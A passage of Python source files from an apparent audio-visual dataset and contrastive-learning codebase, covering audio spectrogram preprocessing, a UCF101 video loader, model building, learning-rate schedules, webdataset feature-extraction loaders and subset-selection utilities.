`orig_freq` (int): original sampling rate of `waveform`.
`new_freq` (int): target sampling rate of `waveform`.
`use_mono` (bool): If True, first convert `waveform` to a monophonic signal.
returns:
(tensor): waveform with dimension of
`channel` x `time`.
"""
if waveform.size(0) != 1 and use_mono:
waveform = waveform.mean(0, keepdim=True)
if orig_freq != new_freq:
waveform = torchaudio.transforms.Resample(
orig_freq, new_freq,
)(waveform)
return waveform
def get_log_mel_spectrogram(
waveform,
audio_fps,
frequency,
time,
):
"""
Convert the input waveform to log-mel-scaled spectrogram.
args:
waveform (tensor): input waveform. The dimension is
`channel` x `time.`
`audio_fps` (int): sampling rate of `waveform`.
`frequency` (int): target frequecy dimension (number of mel bins).
`time` (int): target time dimension.
returns:
(tensor): log-mel-scaled spectrogram with dimension of
`channel` x `frequency` x `time`.
"""
w = waveform.size(-1)
n_fft = 2 * (math.floor(w / time) + 1)
mel_spectrogram = torchaudio.transforms.MelSpectrogram(
audio_fps, n_fft=n_fft, n_mels=frequency,
)(waveform)
log_mel_spectrogram = torch.log(1e-6 + mel_spectrogram)
_nchannels, _frequency, _time = log_mel_spectrogram.size()
assert _frequency == frequency, \
f"frequency {_frequency} must be {frequency}"
if _time != time:
t = torch.zeros(
_nchannels,
frequency,
time,
dtype=log_mel_spectrogram.dtype,
)
min_time = min(time, _time)
t[:, :, :min_time] = log_mel_spectrogram[:, :, :min_time]
log_mel_spectrogram = t
return log_mel_spectrogram
```
#### File: code/data/ucf101.py
```python
import random
import torch
import torchvision
from pathlib import Path
import utils.logging as logging
import data.utils as utils
from data.build import DATASET_REGISTRY
logger = logging.get_logger(__name__)
@DATASET_REGISTRY.register()
class UCF101(torch.utils.data.Dataset):
"""
UCF101 video loader. Construct the UCF101 video loader, then sample
clips from the videos. For training and validation, multiple clips are
uniformly sampled from every video with random cropping, scaling, and
flipping. For testing, multiple clips are uniformaly sampled from every
video with uniform cropping. For uniform cropping, we take the left, center,
and right crop if the width is larger than height, or take top, center, and
bottom crop if the height is larger than the width.
"""
def __init__(self, cfg, mode):
"""
Construct the UCF101 video loader with given text files containing
video paths and a list of classes.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
"""
assert mode in [
"train",
"val",
"test",
], "Mode '{}' not supported for UCF101".format(mode)
if mode == "val":
logger.info(
"UCF101 does not have the val split... "
"Instead we will use the test split"
)
self.mode = mode
self.cfg = cfg
if self.mode in ['train', 'val']:
self._num_clips = cfg.TRAIN.NUM_SAMPLES
elif self.mode in ['test']:
self._num_clips = (
cfg.TEST.NUM_SAMPLES
)
assert cfg.TEST.NUM_SAMPLES == cfg.TEST.NUM_ENSEMBLE_VIEWS * cfg.TEST.NUM_SPATIAL_CROPS, \
f"test num samples {cfg.TEST.NUM_SAMPLES} must be #views {cfg.TEST.NUM_ENSEMBLE_VIEWS} x #crops {cfg.TEST.NUM_SPATIAL_CROPS}"
self.split = cfg[mode.upper()]["DATASET_SPLIT"]
logger.info(f"Constructin UCF101 mode {self.mode} split {self.split}")
self._construct_loader()
def _construct_loader(self):
"""
Construct the video loader.
"""
mode = 'test' if self.mode == 'val' else self.mode
dir_to_files = Path(self.cfg.DATASET_DIR)
class_file = dir_to_files.joinpath(
"splits",
"classInd.txt"
)
path_to_file = dir_to_files.joinpath(
"splits",
f"{mode}list{self.split:02d}.txt"
)
assert class_file.exists(), "{} not found".format(str(class_file))
assert path_to_file.exists(), "{} not found".format(str(path_to_file))
with open(class_file, "r") as f:
classInd = f.readlines()
self.class2idx = {
l.strip().split()[1]: int(l.strip().split()[0]) - 1 for l in classInd
}
self.idx2class = [l.strip().split()[1] for l in classInd]
self._path_to_videos = []
self._labels = []
self._spatial_temporal_idx = []
with open(path_to_file, "r") as f:
dataset = f.readlines()
dataset = [l.strip() for l in dataset]
for clip_idx, l in enumerate(dataset):
if mode in ['train']:
path = str(dir_to_files.joinpath(l.split()[0]))
label = self.class2idx[l.split()[0].split('/')[0]]
elif mode in ['test']:
path = str(dir_to_files.joinpath(l))
label = self.class2idx[l.split('/')[0]]
for idx in range(self._num_clips):
self._path_to_videos.append(path)
self._labels.append(label)
self._spatial_temporal_idx.append(idx)
assert (
len(self._path_to_videos) > 0
), "Failed to load UCF101 mode {} split {}".format(
self.mode, self.split,
)
logger.info(
"Constructing UCF101 dataloader (mode: {}, split: {}, size: {})".format(
self.mode, self.split, len(self._path_to_videos),
)
)
def __len__(self):
"""
Returns:
(int): the number of videos in the dataset.
"""
return len(self._path_to_videos)
def __getitem__(self, index):
"""
Given the video index, return the list of frames, label, and
video index.
Args:
index (int): the video index provided by the pytorch sampler.
Returns:
visual_clip (tensor): the frames of sampled from the video.
The dimension is `channel` x `num frames` x `height` x `width`.
label (int): the label of the current video.
index (int): the index of the video.
"""
frames, waveform, info = torchvision.io.read_video(
self._path_to_videos[index],
pts_unit="sec",
)
video_fps = round(info["video_fps"])
if self.mode in ['train', 'val']:
temporal_sample_index = self._spatial_temporal_idx[index]
# -1 indicates random sampling.
spatial_sample_index = -1
min_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[0]
max_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[1]
crop_size = self.cfg.DATA.TRAIN_CROP_SIZE
num_samples = self._num_clips
elif self.mode in ['test']:
temporal_sample_index = (
self._spatial_temporal_idx[index]
// self.cfg.TEST.NUM_SPATIAL_CROPS
)
# spatial_sample_index is in [0, 1, 2]. Corresponding to left,
# center, or right if width is larger than height, and top, middle,
# or bottom if height is larger than width.
spatial_sample_index = (
self._spatial_temporal_idx[index]
% self.cfg.TEST.NUM_SPATIAL_CROPS
)
# The testing is deterministic and no jitter should be performed.
# min_scale, max_scale, and crop_size are expect to be the same.
min_scale, max_scale, crop_size = [self.cfg.DATA.TEST_CROP_SIZE] * 3
assert len({min_scale, max_scale, crop_size}) == 1
num_samples = self.cfg.TEST.NUM_ENSEMBLE_VIEWS
else:
raise NotImplementedError(
"Does not support {} mode".format(self.mode)
)
# Adjust number of frames consdiering input video fps, taget fps and
# frame sampling rate.
_num_frames = (
self.cfg.DATA.NUM_FRAMES *
self.cfg.DATA.SAMPLING_RATE *
video_fps /
self.cfg.DATA.TARGET_FPS
)
delta = max(frames.size(0) - _num_frames, 0)
# If num_samples == 1, a single clip is randomly sampled from the input
# video. Otherwise, multiple clips are uniformly sampled.
if num_samples > 1:
start_idx = (
delta * temporal_sample_index / (num_samples - 1)
)
else:
start_idx = random.uniform(0, delta)
end_idx = start_idx + _num_frames - 1
visual_clip = self.get_visual_clip(
frames,
start_idx,
end_idx,
min_scale,
max_scale,
crop_size,
spatial_sample_index,
)
label = self._labels[index]
return visual_clip, label, index
def get_visual_clip(
self,
frames,
start_idx,
end_idx,
min_scale,
max_scale,
crop_size,
spatial_sample_index,
):
"""
Sample a clip from the input video, and apply visual transformations.
Args:
frames (tensor): a tensor of video frames, dimension is
`num frames` x `height` x `width` x `channel`.
start_idx (float): the index of the start frame.
end_idx (float): the index of the end frame.
min_scale (int): the minimal size of scaling.
max_scale (int): the maximal size of scaling.
crop_size (int): the size of height and width used to crop the
frames.
spatial_sample_index (int): if -1, perform random spatial sampling.
If 0, 1, or 2, perform left, center, right crop if width is
larger than height, and perform top, center, buttom crop if
height is larger than width.
Returns:
clip (tensor): sampled frames. The dimension is
`channel` x `num frames` x `height` x `width`.
"""
# Temporal sampling.
clip = utils.temporal_sampling(
frames,
start_idx,
end_idx,
self.cfg.DATA.NUM_FRAMES,
)
# Convert frames of the uint type in the range [0, 255] to
# a torch.FloatTensor in the range [0.0, 1.0]
clip = clip.float()
clip = clip / 255.0
# T H W C -> T C H W
clip = clip.permute(0, 3, 1, 2)
# Visual transformations.
clip = utils.apply_visual_transform(
self.cfg,
clip,
spatial_idx=spatial_sample_index,
min_scale=min_scale,
max_scale=max_scale,
crop_size=crop_size,
)
# T C H W -> C T H W
clip = clip.transpose(0, 1).contiguous()
clip = [clip]
return clip
```
#### File: evaluation/code/loader_validation.py
```python
from data import loader
import utils.distributed as du
def loader_validate(cfg):
# Create the audio-visual pretrain loader.
pretrain_loader = loader.construct_loader(cfg, 'pretrain')
num_batches_per_epoch = len(pretrain_loader)
print(f"NUM_BATCHES: {num_batches_per_epoch}")
rank = du.get_rank()
for i, (visual_clip, audio_clip) in enumerate(pretrain_loader):
batch_size = visual_clip[0].size(0)
print(f"[RANK {rank}] step_{i}: batch_size={batch_size}")
```
#### File: code/models/audio_stem_helper.py
```python
import torch.nn as nn
class AudioModelStem(nn.Module):
"""
Audio 2D stem module. Provides stem operations of Conv, BN, ReLU
on input data tensor for the single audio pathway.
"""
def __init__(
self,
dim_in,
dim_out,
kernel,
stride,
padding,
inplace_relu=True,
eps=1e-5,
bn_mmt=0.1,
separable=True,
):
"""
Args:
dim_in (int): the channel dimension of the input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel's size of the convolution in the stem
layer. Frequency kernel size, time kernel size in order.
stride (list): the stride size of the convolution in the stem
layer. Frequency kernel stride, time kernel stirde in order.
padding (list): the padding's size of the convolution in the stem
layer. Frequency padding size, time padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for normalization.
bn_mmt (float): momentum for batch norm.
separable (bool): if True, divide kxk kernel into kx1, 1xk
"""
super(AudioModelStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
# Construct the stem layer.
self._construct_stem(dim_in, dim_out, separable)
def _construct_stem(self, dim_in, dim_out, separable):
stem = ResNetBasicStem(
dim_in,
dim_out,
self.kernel,
self.stride,
self.padding,
self.inplace_relu,
self.eps,
self.bn_mmt,
separable,
)
self.add_module("stem", stem)
def forward(self, x):
x = self.stem(x)
return x
class ResNetBasicStem(nn.Module):
"""
ResNe(X)t 2D stem module.
Performs Convolution, BN, and Relu.
"""
def __init__(
self,
dim_in,
dim_out,
kernel,
stride,
padding,
inplace_relu=True,
eps=1e-5,
bn_mmt=0.1,
separable=True,
):
"""
Args:
dim_in (int): the channel dimension of the input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
Frequency kernel size, time kernel size in order.
stride (list): the stride size of the convolution in the stem layer.
Frequency kernel stride, time kernel stirde in order.
padding (list): the padding size of the convolution in the stem
layer. Frequency padding size, time padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for normalization.
bn_mmt (float): momentum for batch norm.
separable (bool): if True, divide kxk kernel into kx1, 1xk
"""
super(ResNetBasicStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self.separable = separable
# Construct the stem layer.
self._construct_stem(dim_in, dim_out)
def _construct_stem(self, dim_in, dim_out):
if self.separable:
self.conv1 = nn.Conv2d(
dim_in,
dim_out,
[self.kernel[0], 1],
stride=[self.stride[0], 1],
padding=[self.padding[0], 0],
bias=False
)
self.bn1 = nn.BatchNorm2d(
dim_out, eps=self.eps, momentum=self.bn_mmt
)
self.relu1 = nn.ReLU(self.inplace_relu)
self.conv2 = nn.Conv2d(
dim_out,
dim_out,
[1, self.kernel[1]],
stride=[1, self.stride[1]],
padding=[0, self.padding[1]],
bias=False
)
self.bn2 = nn.BatchNorm2d(
dim_out, eps=self.eps, momentum=self.bn_mmt
)
self.relu2 = nn.ReLU(self.inplace_relu)
else:
self.conv = nn.Conv2d(
dim_in,
dim_out,
self.kernel,
stride=self.stride,
padding=self.padding,
bias=False,
)
self.bn = nn.BatchNorm2d(
dim_out, eps=self.eps, momentum=self.bn_mmt
)
self.relu = nn.ReLU(self.inplace_relu)
def forward(self, x):
if self.separable:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu1(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.relu2(x)
else:
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
```
#### File: code/models/build.py
```python
import torch
from fvcore.common.registry import Registry
MODEL_REGISTRY = Registry("MODEL")
MODEL_REGISTRY.__doc__ = """
Registry for video/audio model.
The registered object will be called with `obj(cfg)`.
The call should return a `torch.nn.Module` object.
"""
def build_model(cfg, model=None):
"""
Builds the audio/video model.
Args:
cfg (configs): configs that contains the hyper-parameters to build the
backbone. Details can be seen in config.py.
model (torch.nn.Module): Model module.
"""
if model is None:
# Construct the model
name = cfg.MODEL.TASK
model = MODEL_REGISTRY.get(name)(cfg)
# Determine the GPU used by the current process
cur_device = torch.cuda.current_device()
# Transfer the model to the current GPU device
model = model.cuda(device=cur_device)
# Use multi-process data parallel model in the multi-gpu setting
if cfg.NUM_GPUS > 1:
broadcast_buffers = False
if cfg.MODEL.TASK in ["Contrast"] and cfg.CONTRAST.USE_GLOBAL_BATCH:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
broadcast_buffers = True
# Make model replica operate on the current device
model = torch.nn.parallel.DistributedDataParallel(
module=model,
device_ids=[cur_device],
output_device=cur_device,
broadcast_buffers=broadcast_buffers,
)
return model
```
#### File: evaluation/code/run_net.py
```python
import os
import torch
import utils.multiprocessing as mpu
from config import get_cfg
from contrast_net import contrast
from classify_net import classify
RUN_DICT = {
"Contrast": contrast,
"VisualClassify": classify,
"AudioClassify": classify,
"MultimodalClassify": classify,
}
def main():
"""
Main function to spawn the train and test process.
"""
cfg = get_cfg()
run = RUN_DICT[cfg.MODEL.TASK]
if cfg.NUM_GPUS > 1:
torch.multiprocessing.spawn(
mpu.run,
nprocs=cfg.NUM_GPUS,
args=(
cfg.NUM_GPUS,
run,
cfg.DIST_INIT_METHOD,
cfg.SHARD_ID,
cfg.NUM_SHARDS,
cfg.DIST_BACKEND,
cfg,
),
daemon=False,
)
else:
run(cfg=cfg)
if __name__ == "__main__":
torch.multiprocessing.set_start_method("forkserver")
main()
```
#### File: code/utils/lr_policy.py
```python
import math
def get_lr(
policy,
base_lr,
warmup_start_lr,
global_step,
num_optimizer_steps,
num_warmup_steps,
):
"""
Retrieve the learning rate of the current step with the option to perform
warm up in the beginning of the training stage.
Args:
policy (string): learning rate policy.
base_lr (float): base learning rate
warmup_start_lr (float): warmup start learning rate
global_step (int): current step
num_optimizer_steps (int): the number of total training steps.
num_warmup_steps (int): the number of total warmup steps.
"""
if policy == "linear":
alpha = lr_func_linear(global_step, num_optimizer_steps, num_warmup_steps)
lr = base_lr * alpha
elif policy == "cosine":
if global_step < num_warmup_steps:
alpha = lr_func_linear(global_step, num_optimizer_steps, num_warmup_steps)
lr = warmup_start_lr + (base_lr - warmup_start_lr) * alpha
else:
lr = lr_func_cosine(base_lr, global_step - num_warmup_steps, num_optimizer_steps - num_warmup_steps)
elif policy == "constant":
lr = base_lr
else:
raise NotImplementedError(
"Does not support {} learning policy".format(policy)
)
return lr
def lr_func_linear(current_step, num_training_steps, num_warmup_steps):
"""
Retrieve the learning rate scale using the linear learning rate schedule.
"""
if current_step < num_warmup_steps:
return float(current_step) / float(max(1, num_warmup_steps))
return max(0.0, float(num_training_steps - current_step) / float(max(1, num_training_steps - num_warmup_steps)))
def lr_func_cosine(base_lr, cur_epoch, num_optimizer_epochs):
"""
Retrieve the learning rate of the current step using the cosine learning
rate schedule.
"""
return (
base_lr
* (math.cos(math.pi * cur_epoch / num_optimizer_epochs) + 1.0)
* 0.5
)
```
#### File: acav100m/feature_extraction/check_output.py
```python
import tarfile
from multiprocessing import Pool
import numpy as np
import subprocess
import os
from pathlib import Path
import math
import time
from datetime import datetime
from functools import partial
import argparse
from collections import defaultdict, Counter
import json
import pickle
import csv
import shutil
from tqdm import tqdm
import pandas as pd
def parse_args():
parser = argparse.ArgumentParser(description="construct ms100m dataset")
parser.add_argument("--feat_dir", type=str, required=True, help="feature directory")
# parser.add_argument("--new_feat_dir", type=str, required=True, help="new feature directory")
parser.add_argument("--input_dir", type=str, required=True, help="input directory")
parser.add_argument("--num_workers", type=int, default=1)
args = parser.parse_args()
return args
def run(cmd):
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate()
return out.decode('utf-8')
def get_filenames_of_shard(shard_path):
cmd = [
"tar", "tvf", shard_path,
]
out = run(cmd)
out = out.strip().split('\n')
filenames = [Path(f.split()[-1]).name for f in out if f.endswith('mp4')]
return filenames
def indexing(pkl_path):
shard_name = pkl_path.stem
with open(pkl_path, "rb") as f:
feats_shard = pickle.load(f)
filenames = [feat['filename'] for feat in feats_shard]
return shard_name, filenames
if __name__ == "__main__":
args = parse_args()
print(args)
print("datset feature dir: {}".format(args.feat_dir))
feats_path = sorted(Path(args.feat_dir).glob("*.pkl"))
print("dataset indexing start...")
if args.num_workers > 1:
with Pool(args.num_workers) as pool:
results = list(
tqdm(
pool.imap(indexing, feats_path),
ncols=80,
total=len(feats_path),
)
)
else:
results = []
for pkl_path in tqdm(feats_path, total=len(feats_path), ncols=80):
results.append(indexing(pkl_path))
dataset_dict = {}
for shard_name, filenames in results:
dataset_dict[shard_name] = filenames
print("dataset indexing done...")
input_shard_names = sorted(list(dataset_dict.keys()))
duplicate_files = defaultdict(list)
print("duplicate checking...")
for shard_name in tqdm(input_shard_names, ncols=80):
if len(set(dataset_dict[shard_name])) != len(dataset_dict[shard_name]):
filename_counter = Counter(dataset_dict[shard_name])
for filename in set(dataset_dict[shard_name]):
if filename_counter[filename] > 1:
duplicate_files[shard_name] += [(filename, filename_counter[filename])]
num_duplicate_files = sum([len(duplicate_files[shard_name]) for shard_name in duplicate_files])
print(f"# of duplicate files: {num_duplicate_files}")
with open("dulicate_files.pkl", "wb") as f:
pickle.dump(duplicate_files, f)
non_matching_files = defaultdict(list)
feat_dir = Path(args.feat_dir)
new_feat_dir = Path(args.new_feat_dir)
for shard_name in tqdm(input_shard_names, ncols=80):
with open(os.path.join(args.input_dir, f"{shard_name}.json"), "r") as j:
meta_shard = json.load(j)
filenames = [meta['filename'] for meta in meta_shard]
for filename in dataset_dict[shard_name]:
if filename not in filenames:
non_matching_files[shard_name] += [filename]
num_non_matching_files = sum([len(non_matching_files[shard_name]) for shard_name in non_matching_files])
print(f"# of non matching files: {num_non_matching_files}")
with open("non_matching_files.pkl", "wb") as f:
pickle.dump(non_matching_files, f)
'''
if len(non_matching_files) > 0:
print(f"deleting non matching files")
new_feat_dir.mkdir(exist_ok=True, parents=True)
for shard_name in tqdm(input_shard_names, ncols=80):
pkl_path = feat_dir.joinpath(f"{shard_name}.pkl")
new_pkl_path = new_feat_dir.joinpath(f"{shard_name}.pkl")
if shard_name in non_matching_files:
with open(pkl_path, "rb") as f:
feats = pickle.load(f)
new_feats = [feat for feat in feats if feat['filename'] not in non_matching_files[shard_name]]
with open(new_pkl_path, "wb") as f:
pickle.dump(new_feats, f)
else:
shutil.copy(str(pkl_path), new_pkl_path)
'''
```
#### File: code/data/loader.py
```python
import numpy as np
import torch
from torch.utils.data import DataLoader, IterableDataset
import webdataset as wds
from .webdataset import get_dataset
from utils import identity
from mps import distributed as du
def get_dataloader(args, model, drop_last=False, shuffle=False):
dataset, num_workers = get_dataset(args, model, shuffle=shuffle)
media_path = args.data.media.path
use_webdataset = (
media_path.stem not in ['HMDB51', 'UCF101', 'FSDD', 'KineticsSounds']
)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
if isinstance(dataset, IterableDataset):
shuffle = False
dataloader = DataLoader(
dataset, batch_size,
shuffle=shuffle,
drop_last=drop_last,
num_workers=num_workers,
collate_fn=identity)
return dataloader
def collate(batch):
elem = batch[0]
'''
if isinstance(elem, tuple):
batch = [{**elem[0], 'label': elem[1]} for elem in batch]
elem = batch[0]
'''
collated = {}
pathways_packed = False
for key in elem.keys():
vals = [row[key] for row in batch]
if isinstance(elem[key], np.ndarray):
vals = [torch.Tensor(val) for val in vals]
# stack if possible
if same_shape(vals):
vals = torch.stack(vals, dim=0)
if key == 'data' and packed_pathways(vals):
try:
vals = [torch.stack(v, dim=0) for v in zip(*vals)]
pathways_packed = True
except Exception as e:
print(f"error stacking slowfast features within a batch: {e}")
batch_filenames = [row['filename'] for row in batch]
print(f"filenames in batch: {batch_filenames}")
raise Exception
collated[key] = vals
options = {'pathways_packed': pathways_packed}
return collated, options
def are_tensors(li):
return all([torch.is_tensor(x) for x in li])
def same_shape(li):
if not are_tensors(li):
return False
shapes = [x.shape for x in li]
return all(x == shapes[0] for x in shapes)
def packed_pathways(li):
if not isinstance(li[0], list):
return False
if not torch.is_tensor(li[0][0]):
return False
all_shapes = [[p.shape for p in pathway] for pathway in zip(*li)]
return all([all(x == shapes[0] for x in shapes) for shapes in all_shapes])
```
#### File: code/data/meta.py
```python
import tarfile
import json
from pathlib import Path
from tqdm import tqdm
from mps import distributed as du
from utils import load_pickle, dump_pickle
def load_metadata(args, shard_paths):
if args.data.meta.path is not None:
meta_path = Path(args.data.meta.path)
cache_path = meta_path / 'meta_cache.pkl'
if cache_path.is_file():
shards_size_dt = load_pickle(cache_path)
to_load = [p for p in shard_paths if Path(p).stem not in shards_size_dt.keys()]
if len(to_load) > 0:
_, _, shards_size_dt_upd = _load_metadata(args, to_load)
shards_size_dt = {**shards_size_dt, **shards_size_dt_upd}
dump_pickle(shards_size_dt, cache_path)
else:
_, _, shards_size_dt = _load_metadata(args, shard_paths)
dump_pickle(shards_size_dt, cache_path)
else:
_, _, shards_size_dt = _load_metadata(args, shard_paths)
return shards_size_dt
def _load_metadata(args, shard_paths):
shards_size = []
shards_size_dt = {}
metadata = {}
pbar = shard_paths
if du.get_rank() == 0:
# only for one process
print("loading metadata from json files")
pbar = tqdm(shard_paths)
for shard_path in pbar:
shard_name = Path(shard_path).stem
if args.data.meta.path is not None:
meta_path = Path(args.data.meta.path)
if meta_path.is_dir():
meta_path = meta_path / "{}.json".format(shard_name)
else:
meta_path = Path(shard_path).parent / "{}.json".format(shard_name)
if meta_path.is_file():
filenames = get_filenames_from_tar(shard_path)
with open(meta_path, 'r') as f:
shard_file = json.load(f)
filenames_in_meta = set([Path(line['filename']).stem for line in shard_file])
# count = len(shard_file)
filenames = filenames & filenames_in_meta
count = len(filenames)
for line in shard_file:
idx = Path(line['filename']).stem
if idx in filenames:
line['shard_size'] = count
line['shard_name'] = shard_name
metadata[idx] = line
'''
else:
print(f"filename {idx} in tar file ({shard_path}) not present in metadata json file ({meta_path})")
'''
shards_size.append(count)
shards_size_dt[shard_name] = count
return metadata, shards_size, shards_size_dt
def get_filenames_from_tar(path):
with tarfile.open(path, 'r') as f:
filenames = set([Path(filename).stem for filename in f.getnames()])
return filenames
```
#### File: code/data/webdataset.py
```python
import json
import tarfile
import types
from pathlib import Path
from functools import partial
# import braceexpand
import torch
import webdataset as wds
from tqdm import tqdm
from save import load_shard_caches
from utils import get_num_workers, get_tensor_size, identity
from .shards import get_shards_size, get_shards_path
from .preprocess import Preprocessors
from .video import load_video_webdata
from .metawebdataset import MetaWebDataset
from mps import distributed as du
def _get_name(finfo, id_len=12):
path = finfo['__key__']
key = Path(path).stem
filename = Path(path).name
start = int(key[id_len:])
return finfo['mp4'], {'idx': key, 'start': start, 'filename': filename,
#'shard_size': finfo['shard_size'],
'shard_name': finfo['shard_name']}
def _add_meta(row, shards_size_dt):
videos, meta = row
name = meta['shard_name']
meta['shard_size'] = shards_size_dt[name]
# meta = {**meta, **metadata[idx]}
return {key: {**meta, **video} for key, video in videos.items()}
def get_dataset(args, models, shuffle=False):
shards_path, rest = get_shards_path(args, f=get_shards_size)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
# Here, shards_path is the list of paths to shards allocated to current node (gpu)
# (after discarding if args.computation.discard_shards is set)
num_workers, effective_num_workers = get_num_workers(
args.computation.num_workers, len(shards_path)
)
out_str = "#Workers of Feature Extraction Dataset"
out_str += f" (node={du.get_rank()})"
out_str += f": {num_workers}"
print(out_str)
shards_size_dt = rest['shards_size_dt']
shard_names = [Path(p).stem for p in shards_path]
if args.acav.force_cache_restart:
skip_lists = {}
caches = None
shards_size = [shards_size_dt[key] for key in shard_names]
else:
caches, skip_lists = load_shard_caches(args, shards_path)
shards_size = [shards_size_dt[key] - len(skip_lists[key]) for key in shard_names]
# print('building dataset')
data = MetaWebDataset(shards_path, handler=wds.warn_and_continue,
skip_lists=skip_lists)
id_len = 25 if args.acav.use_replicates else 12
get_name = partial(_get_name, id_len=id_len)
load_video = partial(load_video_webdata,
num_frames=args.data.media.num_frames,
duration=args.acav.duration,
skip_shorter_seconds=args.acav.duration * args.acav.skip_shorter_ratio)
add_meta = partial(_add_meta, shards_size_dt=rest['shards_size_dt'])
preprocess = Preprocessors(args, models)
data = (
data
.map(get_name, handler=wds.warn_and_continue)
.map_tuple(load_video, identity, handler=wds.warn_and_continue)
.pipe(drop_none)
.map_tuple(preprocess, identity, handler=wds.warn_and_continue)
# .pipe(drop_none_post)
.map(check_data_none, handler=wds.warn_and_continue)
.map(add_meta, handler=wds.warn_and_continue)
)
if shuffle:
data = data.shuffle(args.computation.shuffle_bufsize)
'''
if the actual number of datapoints is smaller than length,
the ResizedDataset will fill the difference with duplicate datapoints
'''
# Here, shards_size is the list of sizes of all input shards, not those allocated on current
# node (gpu)
# (after discarding if args.computation.discard_shards is set)
# print('resizing dataset')
'''
if du.get_rank() == 0:
print("total dataset_size: {}".format(sum(shards_size)))
'''
print("rank {} dataset_size: {}".format(du.get_rank(), shards_size))
length = du.get_length(
shards_size, batch_size, args.computation.num_workers, world_size
)
nominal = length * effective_num_workers
# print('X', shards_size, length, effective_num_workers, args.computation.num_workers)
data = wds.ResizedDataset(
data,
length,
nominal,
)
data.caches = caches
return data, num_workers
def _decode_label(anno, class2idx):
label = anno['annotations']['label']
return torch.tensor(class2idx[label], dtype=torch.long)
def drop_none(it):
for row in it:
data, label = row
if data is not None and \
data[0][0] is not None and \
data[1][0] is not None:
yield data, label
def check_data_none(row):
videos, meta = row
assert meta is not None, 'metadata is None'
assert videos is not None, 'data is None'
for model_name, video in videos.items():
assert isinstance(video, dict), 'data is not a dict'
assert video['data'] is not None, 'data feature is None'
return row
def _preprocess(data, model):
if data is None or data[0][0] is None or data[1][0] is None:
return None
else:
output = model.preprocess(*data) # {'data': preprocessed, 'fps': fps}
if 'data' in output and get_tensor_size(output['data']) == 0:
return None # no element
else:
return output
```
#### File: subset_selection/code/args.py
```python
import os
import sys
from pathlib import Path
import torch
from munch import DefaultMunch
from config import defaults
def get_args(**kwargs):
args = defaults
args = update_args(args, kwargs)
args = process_paths(args)
args = objectify(args)
args.computation.device = 'cpu'
if args.computation.use_gpu:
if torch.cuda.device_count() > 0:
print("using gpu")
args.computation.device = 'cuda'
else:
print("no gpu available, defaulting to cpu")
if args.computation.num_gpus is None:
args.computation.num_gpus = sys.maxsize
args.computation.num_gpus = min(
args.computation.num_gpus,
torch.cuda.device_count()
)
print("args:")
print(args)
return args
def update_args(args, *additional_args):
for new_args in additional_args:
args = _update_args(args, new_args)
return args
def _update_args(args, new_args):
def _recurse(keys, args, v):
if len(keys) > 0:
current, keys = keys[0], keys[1:]
dt = args[current] if current in args else {}
args[current] = _recurse(keys, dt, v)
return args
else:
return v
for k, v in new_args.items():
keys = k.split('.')
args = _recurse(keys, args, v)
return args
def process_paths(args):
suffixes = ['_file', '_dir']
def _recurse(args):
if 'path' in args and args['path'] is not None:
args['path'] = Path(args['path']).resolve()
for k, v in args.items():
for suffix in suffixes:
if k.endswith(suffix) and v is not None:
args[k] = Path(v).resolve()
break
if isinstance(v, dict):
args[k] = _recurse(v)
return args
args = _recurse(args)
return args
def objectify(args):
def _recurse(dt):
for k, v in dt.items():
if isinstance(v, dict):
dt[k] = _recurse(v)
dt = DefaultMunch(None, dt)
return dt
return _recurse(args)
```
#### File: subset_selection/code/multiprocess.py
```python
import time
import datetime
from multiprocessing import Pool
def multiprocess(func, data, num_workers=1, granularity='shards',
log_every=1000, verbose=False):
start = time.time()
if num_workers > 1:
if verbose:
print("parallel processing")
out = {}
with Pool(num_workers) as p:
count = 0
chunksize = max(1, len(data) // (num_workers))
for i, res in p.imap_unordered(func, enumerate(data), chunksize=chunksize):
out[i] = res
count += 1
if verbose:
if (count + 1) % log_every == 0:
elasped = time.time() - start
elasped = str(datetime.timedelta(seconds=elasped))
print("{}/{} {} processed (elasped: {})".format(count, len(data), granularity, elasped))
else:
if verbose:
print("sequential processing")
out = []
count = 0
for i, x in enumerate(data):
i, res = func((i, x))
out.append(res)
count += 1
if verbose:
if (count + 1) % log_every == 0:
elasped = time.time() - start
elasped = str(datetime.timedelta(seconds=elasped))
print("{}/{} {} processed (elasped: {})".format(count, len(data), granularity, elasped))
out = dict(enumerate(out))
if verbose:
print("sorting multiprocess outputs")
out = [out[k] for k in sorted(list(out.keys()))]
return out
```
#### File: subset_selection/code/pairing.py
```python
from itertools import combinations, product
from collections import defaultdict
def get_cluster_pairing(keys, cluster_pairing):
pairing_dict = {
'diagonal': get_diagonal,
'bipartite': get_bipartite,
'combination': get_combination,
}
cluster_pairing = cluster_pairing.lower()
assert cluster_pairing in pairing_dict, f"invalid cluster pairing type: {cluster_pairing}"
return pairing_dict[cluster_pairing](keys)
def get_combination(keys):
clustering_indices = range(len(keys))
group_size = 2
clustering_combinations = combinations(clustering_indices, group_size)
return list(clustering_combinations)
def get_bipartite(keys):
keys = {v: i for i, v in enumerate(keys)}
views = defaultdict(list)
for key, idx in keys.items():
view = key[0] # get dataset+model name
views[view].append(idx)
views = list(views.values())
return list(product(*views))
def get_diagonal(keys):
